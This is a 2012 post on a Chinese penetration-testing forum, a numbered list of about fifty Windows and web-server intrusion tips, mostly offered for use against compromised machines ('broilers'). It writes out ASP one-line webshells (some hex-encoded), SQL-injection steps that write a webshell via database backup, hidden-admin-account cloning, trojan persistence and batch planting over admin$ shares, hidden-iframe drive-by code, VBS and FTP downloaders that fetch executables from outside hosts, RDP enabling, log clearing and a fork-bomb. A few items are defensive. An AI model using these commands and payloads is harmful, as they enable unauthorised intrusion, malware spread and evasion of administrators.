中国网络渗透测试联盟
标题:
入侵渗透笔记
[打印本页]
作者:
admin
时间:
2012-9-15 14:13
标题:
入侵渗透笔记
Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
% e. f: T9 U3 K- A& s7 y
cacls C:\windows\system32 /G hqw20:R
+ I! o+ f% e/ u4 A/ R W Z( J
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
4 ^* ?# p) ~( L* b$ ]6 `
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
. Q0 d7 \% p7 V1 S; r
3 w) G& I& o( Y" ]- ^
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
: H6 Y$ @+ {, r* a; T" I
* ?# f1 K; H# u& G
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
4 P- Y% F& @' y' P$ B* z( P
9 X* c) p: z$ c+ \ ?* I* Z
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
+ C; `" \2 _$ i1 @! R6 O; |
) }: }9 O0 w0 G) q2 }6 ]5 V
5、利用INF文件来修改注册表
+ n8 n& Q4 Z4 a, B) I' D
[Version]
7 K3 i" u! B, J1 q8 B" I6 j
Signature="$CHICAGO$"
# f. x3 Z5 U0 Z0 V! R
[Defaultinstall]
& l3 j" U5 q. o6 \% z- g @ p/ i
addREG=Ating
7 g8 E; q: I# a. |5 C1 y
[Ating]
! ?0 ` p: `3 K; @# f5 g
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
1 R( w. [' `* q: D9 I& F% x
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
0 K6 E" T5 h- e+ y' z8 _
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
9 y+ C7 F. m/ p1 U; v* n
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
5 b# Y- {' }8 }* X# y+ w
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
/ U- h8 ~* k1 Z8 U$ M7 L' O9 ]+ \
HKEY_CURRENT_CONFIG 简写为 HKCC
; m% \- t4 l( U ^$ h( j% y% k
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
8 Z8 o' y! @ Y- B* V4 F
"1"这里代表是写入或删除注册表键值中的具体数据
/ E# T1 p# o6 e( W" N
' a1 G: \# l; T+ e9 k+ r1 _' [ s" l
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
6 b) D7 Z7 \& Y' h
多了一步就是在防火墙里添加个端口,然后导出其键值
* I d3 w c( B0 b$ h
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
' J( k! _3 K/ Y. o# I" R* o
( K+ T& k1 y5 S5 N5 }7 a3 f
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
2 ~1 Z4 p0 a2 E( o" K
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
: N! L3 u/ d% F
' }) G) W" J# x1 _
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
1 K- L3 l; g) y- K& D1 ~
! U0 F: E+ p/ {6 p0 ~0 Y
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
# I: y1 B! c4 h
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
7 h9 O$ B% o6 J/ d M2 {$ ~. l
+ _. G! V, v/ S5 Q/ T7 h/ s
10、用google帮我们找网站后台,搜索”filetype:asp site:
www.hack6.com
inurl:login”
/ U* e2 D1 B, k' r
2 F! b% v5 Z4 X
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
. h+ }" E, Y) x) g4 x2 @" W$ H
用法:xsniff –pass –hide –log pass.txt
" y# M: `* Z" u3 _
, m% b+ I0 _3 N3 v: L5 I9 }
12、google搜索的艺术
8 r; t3 V- p5 I- ]0 y E K0 _
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
- ?8 r1 `" i+ z& B3 L
或“字符串的语法错误”可以找到很多sql注入漏洞。
6 {* X' O5 W4 w# L
9 A" [9 w: m$ T# S
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
6 T* Y9 [/ C' Y! f4 y% m
m! y$ }6 [; S* A( B
14、cmd中输入 nc –vv –l –p 1987
- @5 b1 j6 l5 _2 p7 D. W% A
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
7 w4 r( c" |+ v% L6 M
8 }3 }# \* [- h
15、制作T++木马,先写个ating.hta文件,内容为
) D: s$ I) C+ ~8 @6 I5 c2 B
<script language="VBScript">
& L( d- t+ M) r, k
set wshshell=createobject ("wscript.shell" )
3 g! c$ j1 A& @% }/ q6 I: N8 ]6 i) n
a=wshshell.run("你马的名称",1)
, L6 T" T/ O/ Q7 n S0 D" {
window.close
' y7 s9 G1 C) E# J
</script>
5 x, _3 B% p Y4 w% y# S
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
! x: f3 X7 n6 H! U b& t* s; Z7 A3 N
% [9 w, ?; }# _* z5 }( L0 b6 V
16、搜索栏里输入
- B! l- D' ]+ q! @
关键字%'and 1=1 and '%'='
2 x& n# m7 q2 M+ ^% t' w
关键字%'and 1=2 and '%'='
7 Y4 P. K6 L4 _7 N9 N, M& ^/ E' b% N t
比较不同处 可以作为注入的特征字符
7 n- U/ M+ v( \6 W b8 G3 F+ x
: v% n+ }$ O- C" c' z( p
17、挂马代码<html>
f- x9 a& O5 g; b- P
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
$ f; r# i- u5 K' S& Z) Q
</html>
, M3 X# j4 K q: ^+ @9 h
; A8 I5 l' x7 D' e, I; W/ q
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
2 B' @# m6 X o1 y: L
net localgroup administrators还是可以看出Guest是管理员来。
6 d, D0 ~& x% H5 s- [9 q9 p1 q
: S" T, D3 C6 N/ r" Z
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
3 ~* y) x& [& E |7 w
用法: 安装: instsrv.exe 服务名称 路径
1 p) ~% G# N/ M3 \6 y# h. C
卸载: instsrv.exe 服务名称 REMOVE
: v" v8 V, O7 L4 `! j
9 M- v- `. p; O! X. T
, V3 x8 M$ h/ |
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
. y4 U* Q- M- r; ^( O
不能注入时要第一时间想到%5c暴库。
2 K% P" g2 J* \1 c% }3 K" S
& K8 Z- u6 @' K1 p' K" c
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
' T1 r2 R/ \, d* w: Z
+ R. t) X; m" _0 U9 X; q
23、缺少xp_cmdshell时
8 B! a d9 Y# c
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
" N7 y9 I& {9 j% L" u6 [
假如恢复不成功,可以尝试直接加用户(针对开3389的)
1 b [0 ]. E: r; l3 X2 u7 [0 p
declare @o int
7 \1 v6 x8 O) a4 x
exec sp_oacreate 'wscript.shell',@o out
2 i7 y7 D: x/ N+ Y0 s
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
9 h, ?, \3 P# y- w* E: {
6 S* x% I6 b/ y% R0 L
24.批量种植木马.bat
& _; { d# z1 V- [, T" s5 ]& ^7 p
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
" h9 I7 {6 z8 C: f: ~
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
! a' G4 k/ ~, j/ {! t! a
扫描地址.txt里每个主机名一行 用\\开头
8 L3 q9 u8 u2 o9 I
/ O- k2 _7 R B
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
) F3 n7 C0 G0 X1 f
% j' P5 D* X. `- C7 l
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
% K* y) k$ P/ k# O. {1 c
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
9 b2 d m% c% A2 `- c# o# V, Q
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
* q% I# E5 r, ^8 h
& f6 ]0 w- e# M
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
% f4 v2 i' R) k
然后用#clear logg和#clear line vty *删除日志
; y, q2 [7 w# f
# b; b5 ? U7 D; K. S- U: k
28、电脑坏了省去重新安装系统的方法
8 R, f9 A& B1 K5 o4 u4 r
纯dos下执行,
. s; y( e2 g" s* o8 a. M ^* N
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
o9 \# q( }# d1 ~. A! {
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
. G2 h) }" _& K c9 R
% F- G) U' _/ B8 b5 I4 K
29、解决TCP/IP筛选 在注册表里有三处,分别是:
6 r) z$ P H+ h C' u& @
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
, {- S+ V( H% P; ?1 m2 \, P/ ?
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
: X6 m, ~/ J5 w' @+ A
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
, m- K4 m6 c2 U* O2 `# R* \7 e
分别用
; t- W' x1 J2 l+ G0 n/ ^, H
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
. } }- t* f3 r( d0 b) y
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
* ~3 S: F" N" _' X3 \: r, ~
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
1 F0 y2 o y: ^
命令来导出注册表项
5 d) a' t3 j N
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
5 }; k2 W- K# t) ~
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
$ f3 `1 D$ F3 `; b' _
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
" `9 B7 e. z5 x8 R9 Y! |" n/ b
+ Z4 c5 W: a1 J9 J3 A6 X3 K
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
5 h/ {3 N. ~9 q; B
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
3 Q# b% i; n l' O
" Y7 x% ^* Y: n/ w( Z$ o
31、全手工打造开3389工具
: j9 A; v- z6 C
打开记事本,编辑内容如下:
% t5 z: C4 B& ~
echo [Components] > c:\sql
?; ^" j; u9 K" |2 y
echo TSEnable = on >> c:\sql
' e4 {& V5 w( q( o9 Y1 J- v
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
; K9 e- e5 h( X! s
编辑好后存为BAT文件,上传至肉鸡,执行
) {/ R9 f. o6 K- @
) j9 Y3 I8 K A+ h$ w
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
) M0 ^. z# F: L |& z
) F, V3 O! o5 |; ?% `
33、让服务器重启
0 s% T! G/ f3 k- k9 Y
写个bat死循环:
' B3 h: f1 c/ X+ N1 B5 Y/ H6 V
@echo off
: d; I% i* A3 D: y$ M* L
:loop1
' R0 F$ ?1 V8 w: L# M& e
cls
3 a' M! h+ o5 [/ B1 O
start cmd.exe
( |3 `1 }7 @$ k% J
goto loop1
6 r" \9 B" q {9 @: V7 j5 W% z
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
1 J a# d5 r: D# b# U: }3 m
" l4 o1 \3 Q2 F0 ?3 o% p
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
* S& H5 k0 F; L( n' a
@echo off
3 t- c1 t5 l% k0 n; [5 U
date /t >c:/3389.txt
% n+ }6 _6 |; h
time /t >>c:/3389.txt
5 }3 K8 p' M& D, E1 |: e
attrib +s +h c:/3389.bat
/ R3 f, U( m9 M& f
attrib +s +h c:/3389.txt
' m* F; `5 R3 A, r1 @+ c
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
0 K3 |2 _" q7 B) y
并保存为3389.bat
$ F6 O, ^0 ]+ V- O! _
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
D$ a O9 ?: h ^" L
' F& ?+ S; \5 \- V3 s6 s( X5 L. O: R
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
" d! } h X M' {3 I
start
http://www.hack520.org/muma.htm
然后点执行。(muma.htm是你上传好的漏洞网页)
]/ V0 C2 w9 o+ @2 J. {
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
1 A, I3 j# j! @: i
1 F' Z; n8 f& Q
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
^2 F- E) P1 P* K! Z
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
1 G( `* o, {3 U" s% O! S( x+ {
echo 你的FTP账号 >>c:\1.bat //输入账号
. S) a1 E# d0 _, h
echo 你的FTP密码 >>c:\1.bat //输入密码
' G6 }0 N0 r, F5 X; @5 q& F# q- o
echo bin >>c:\1.bat //登入
* r$ J5 x+ i" H" j
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
4 ^2 b) z* ^* r' g! |2 X
echo bye >>c:\1.bat //退出
' k& k. C& W) ?' _8 l
然后执行ftp -s:c:\1.bat即可
5 T) L' u3 j1 i# i2 s
. m- `% X9 Z" V* ]* s: [0 Y
37、修改注册表开3389两法
( C% }1 z8 w# g0 G: a. L- X8 D) n
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
0 F) w) Q% ?9 [) h& X# `3 w
echo Windows Registry Editor Version 5.00 >>3389.reg
9 s8 d. C6 k! I* S
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
I5 }; \" m6 Q1 ?
echo "Enabled"="0" >>3389.reg
& t) e O$ t; P+ |4 V
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
9 ^5 F# ~4 n2 k$ y! O, r
NT\CurrentVersion\Winlogon] >>3389.reg
k2 S# j+ @) K
echo "ShutdownWithoutLogon"="0" >>3389.reg
& D. v3 p" q# M
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
: w+ x. m4 a& V: p
>>3389.reg
1 Y! m( Z6 F+ S* ^3 ]2 F1 D- _
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
! t; P5 x7 R- v9 p3 r m
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
8 F1 D J' a- o
>>3389.reg
1 c$ `) q* P$ _ O$ `
echo "TSEnabled"=dword:00000001 >>3389.reg
N) z/ m f+ ?6 F( H, i; {
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
' w. p2 P$ V# S% }- w
echo "Start"=dword:00000002 >>3389.reg
4 m1 b# b% P" z ?6 F3 c
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
: j- V5 [; t# j, g; v! |+ ]
>>3389.reg
6 _0 W! @7 k; s* \% D2 i
echo "Start"=dword:00000002 >>3389.reg
) L4 j: @8 T( {( E/ i5 K* J
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
9 K( Z# H( U ?# _9 U! b4 I
echo "Hotkey"="1" >>3389.reg
& z1 b" b; ` Y) W8 g
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
* V* D& L& z, K3 q- z
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
/ I4 b$ M, w. g" i! d1 ?
echo "PortNumber"=dword:00000D3D >>3389.reg
, v" V0 i5 S& L, H+ s q7 N
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
1 T! ]. G' M: L$ Z6 F ]+ K
Server\WinStations\RDP-Tcp] >>3389.reg
6 w' a( _6 t2 H
echo "PortNumber"=dword:00000D3D >>3389.reg
' j& D" S1 g/ l. j" U% ~
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
2 b A: F+ o& C
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
# H* r1 z p+ M) e" V+ Y% U
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
7 Q; J, F' n' B1 v* A/ `2 \
(2)winxp和win2003终端开启
1 {5 K$ g7 p/ p8 Q) }
用以下ECHO代码写一个REG文件:
; R0 }0 Q, T! R% `" \; r6 c
echo Windows Registry Editor Version 5.00>>3389.reg
3 V z, q5 N N7 b) k* z
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
/ m4 Q, O2 m( w: b: K5 [, _5 x
Server]>>3389.reg
" J& f+ q% A) u+ i
echo "fDenyTSConnections"=dword:00000000>>3389.reg
' L) J* x; L8 |: E/ Q' |) `; S+ a
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
: X" {. g' j: P3 g0 I
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
! R7 q2 L% y9 J6 s
echo "PortNumber"=dword:00000d3d>>3389.reg
& S8 O$ Z6 W" m7 d0 C5 P
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
" W! E t5 n! A0 o& M
Server\WinStations\RDP-Tcp]>>3389.reg
7 M1 H, O: v6 }5 t0 e2 ?4 q2 E
echo "PortNumber"=dword:00000d3d>>3389.reg
- w! v& o- m2 o5 E% l ]4 J$ `
然后regedit /s 3389.reg del 3389.reg
" [: w4 ^' M& q
XP下不论开终端还是改终端端口都不需重启
$ `9 l, Z# J ]2 W
9 L$ a3 S) a3 `
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
) ^' T6 ~- ^, g1 N2 ~9 m7 B: T
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
* G- L) S! q& [' d- V3 X- Y3 o/ p
3 a% t, Y- z- ?
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
" e, \& j' h/ \! r; v; r4 o6 @/ t0 F
(1)数据库文件名应复杂并要有特殊字符
: s# E# u( P5 y
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
7 F+ @5 o$ q: s6 X) n" D
将conn.asp文档中的
4 E. v4 v' t/ Y7 z
DBPath = Server.MapPath("数据库.mdb")
) n0 g& a+ _$ {
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
1 x$ E( ^" f2 _
@7 U) k. ?# L* K q! \2 B
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
; ?5 C' V+ I; l; [- }
(3)不放在WEB目录里
9 e# H% H4 h1 _" B
: I, C' @8 L7 R3 @/ G
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
% M1 X8 d4 ?* a, o1 t7 ~$ I) a: H
可以写两个bat文件
7 a. A# n' o) c% F" q
@echo off
7 v: a; Y. k. H: C- s
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
4 O* @! ^/ A2 H6 l
@del c:\winnt\system32\query.exe
5 @; Q: P; c' B# ?5 `. f0 M
@del %SYSTEMROOT%\system32\dllcache\query.exe
5 U/ g# r) o3 H* _( c9 J
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
* G2 U/ u: c. P" W& V$ e- @
2 {* }& F" S# M* r1 {0 W
@echo off
' Y1 ~9 w. q0 J, O& b) M4 @
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
" q8 L* b! u( n
@del c:\winnt\system32\tsadmin.exe
( j' V6 Z1 W% N& t
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
: o0 P9 `7 p1 M
/ V# {5 _7 y+ m1 d4 t1 |7 \
41、映射对方盘符
2 {% K& J" W3 Z8 k* o
telnet到他的机器上,
5 n" r9 o3 K3 d. K
net share 查看有没有默认共享 如果没有,那么就接着运行
, `- d) E3 [# o! D" A3 y
net share c$=c:
) _$ |/ \: f8 \, Z( T
net share现在有c$
3 N7 X# R3 S& ` l2 h, m, j6 f' k
在自己的机器上运行
2 I9 `5 ]2 ^! i3 Y) R: j) `
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
7 y* [5 L5 V6 J( M! r. S& W/ r, T
8 _& ~0 @) B+ v/ B
42、一些很有用的老知识
1 q' D9 b. ]- ?6 `) C
type c:\boot.ini ( 查看系统版本 )
2 t- t6 ]5 }$ K7 u! i- i# `
net start (查看已经启动的服务)
8 y+ D# I' c# o: D
query user ( 查看当前终端连接 )
4 c v1 X j' f6 v; o
net user ( 查看当前用户 )
4 z1 @ L# g. f# c, c
net user 用户 密码/add ( 建立账号 )
9 o, K+ [/ E7 K: ]% i4 _+ d9 n
net localgroup administrators 用户 /add (提升某用户为管理员)
8 A- @ ? T& r) X3 C1 f
ipconfig -all ( 查看IP什么的 )
: p: [3 L) {: i5 ], y
netstat -an ( 查看当前网络状态 )
$ C v( m2 Q+ f2 c0 Z) n3 j5 c$ E, e
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
+ Z3 J7 b5 T! H
克隆时Administrator对应1F4
5 c# o# ?5 [0 b2 W
guest对应1F5
" J5 L2 F; i/ |- g% A! B; E- ^
tsinternetuser对应3E8
) B6 ^7 y. l% U. P! [2 X
* L) f% y2 W/ b. x
43、如果对方没开3389,但是装了Remote Administrator Service
# O9 }3 M' M; H" ^1 }3 `5 N4 j
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
' @6 M2 e$ L, h+ f
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
; i# F* V0 A- |: l# ` d5 |8 B( [
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
) O! b3 F6 D/ A+ L. r6 v
1 D2 O' m. U4 r
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
0 o" v% B* M& _7 i. \ m
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
K: R+ n! F4 c& m* h5 N9 B
; `& n2 T( ?7 g& U
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
' K) Y6 G. g- d
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
5 r! q O( L3 N, N- k. ?
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
1 ?! T" Z% L! f
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
/ x9 P- R( n/ {& g, w X; f
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
. A6 }: _) |& h% @
(这是完整的一句话,其中没有换行符)
t2 T# D$ Y* U/ k
然后下载:
. m- w2 @- H" ?. I
cscript down.vbs
http://www.hack520.org/hack.exe
hack.exe
8 _4 x, U8 A. V' g c
% Q) S! \+ P( D _6 v# V
46、一句话木马成功依赖于两个条件:
4 {: F# g b- ?8 n' o
1、服务端没有禁止adodb.Stream或FSO组件
/ ^& [, U8 s6 b
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
0 I% [3 U3 g; A4 D( m
3 C7 F4 ]8 k4 X8 c; L/ Z' h
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
8 }" v" I) j% n0 F+ T# b
;alter database utsz set RECOVERY FULL--
7 p/ u8 T- w- o3 k! ^, S. G
;create table cmd (a image)--
' Z$ |/ e! C G0 F3 v0 S
;backup log utsz to disk = 'D:\cmd' with init--
a5 ^$ q, S2 n% U3 p' V' U% n; `
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
. A6 g5 `6 l7 p* @$ A Q
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
9 [+ l8 r! b( B
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
6 d5 ~( M1 F. {4 O: f% r: B
- B- O$ e: X3 K: b
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
7 n m1 _* H* N6 i
7 R% B$ P3 ~5 ?. z- J- h
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
! h* P& `- D A1 r
所有会话用 'all'。
& S6 n2 |4 ~6 k7 y9 U
-s sessionid 列出会话的信息。
: q* O% l0 K/ ]! R
-k sessionid 终止会话。
1 q$ W( J. n Z
-m sessionid 发送消息到会话。
2 h" i* H/ D& }2 r) v
9 d) H' v/ e* e, q
config 配置 telnet 服务器参数。
1 R3 P* ?& c! |% m/ P2 E4 q: I
2 _# E2 o5 h. N. j" m: S& e: w- V
common_options 为:
0 W4 a7 M$ h3 ^1 h7 X6 U
-u user 指定要使用其凭据的用户
1 |- |' F0 `8 G& b7 N/ o4 e5 o
-p password 用户密码
& v9 \, M" I7 Y9 i2 C
6 g6 `' {. o# s
config_options 为:
& ~! K; o) D7 Z8 S, s
dom = domain 设定用户的默认域
3 e; q" Z% S' ^$ a7 T
ctrlakeymap = yes|no 设定 ALT 键的映射
4 ]1 p* h& W! f" v% a' y
timeout = hh:mm:ss 设定空闲会话超时值
8 u% p2 ^( I, m5 e3 {! e0 o8 a6 ~
timeoutactive = yes|no 启用空闲会话。
* p$ B ^; Z: `% ]+ [" U
maxfail = attempts 设定断开前失败的登录企图数。
' U2 p/ J3 a& k! @
maxconn = connections 设定最大连接数。
6 [, M( }! |7 }2 I
port = number 设定 telnet 端口。
, t% W4 W: D; U2 L9 O5 G/ o7 f: _
sec = [+/-]NTLM [+/-]passwd
& I) ?% ]3 |" G% G% Z
设定身份验证机构
& X9 q% l7 j5 a4 `: Z% x& C% w
fname = file 指定审计文件名。
% M+ K5 Z- ~) ~
fsize = size 指定审计文件的最大尺寸(MB)。
8 f0 k0 b X" s# q; p
mode = console|stream 指定操作模式。
9 E8 A$ p( z1 E; }, i0 _8 P5 j6 \, Y
auditlocation = eventlog|file|both
1 p7 w2 U. X3 B' W! C
指定记录地点
D7 f! T7 i9 `, b g
audit = [+/-]user [+/-]fail [+/-]admin
/ x1 p2 Y2 O' \# G6 `5 d2 q' d) Z
8 f4 f8 G9 d. r9 Z+ Y+ `
49、例如:在IE上访问:
* q, U6 ]/ B' q9 x$ S/ Q) n
www.hack520.org/hack.txt
就会跳转到
http://www.hack520.org/
. `3 V- v2 q6 A- P' l% B
hack.txt里面的代码是:
, z9 ?9 x7 _5 f
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
9 D) t8 r$ N. O) l$ x
把这个hack.txt发到你空间就可以了!
2 \+ ?$ J/ R" V W8 J
这个可以利用来做网马哦!
( m$ \: W, j$ z$ T( A- Q# i) Q
8 v( M4 f. B1 ~/ p: ~+ X o
50、autorun的病毒可以通过手动限制!
4 K: V* L7 o! ^3 E0 E8 K
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
. c) G1 p9 ^6 R) f: s
2,打开盘符用右键打开!切忌双击盘符~
2 z! i. x" C& x& e2 ^) \
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
7 c4 ?. t3 c* X
5 P Z3 b$ V% j {
51、log备份时的一句话木马:
& n: d5 [6 t8 Y/ e1 w& G
a).<%%25Execute(request("go"))%%25>
+ X6 K9 @' G) q3 {! n9 f
b).<%Execute(request("go"))%>
; x. H C1 |4 p" _# I, {( t
c).%><%execute request("go")%><%
^# Y+ ~; S: a7 W" w% @ {! ]
d).<script language=VBScript runat=server>execute request("sb")</Script>
; ?, l- Y1 z& Y2 ~
e).<%25Execute(request("l"))%25>
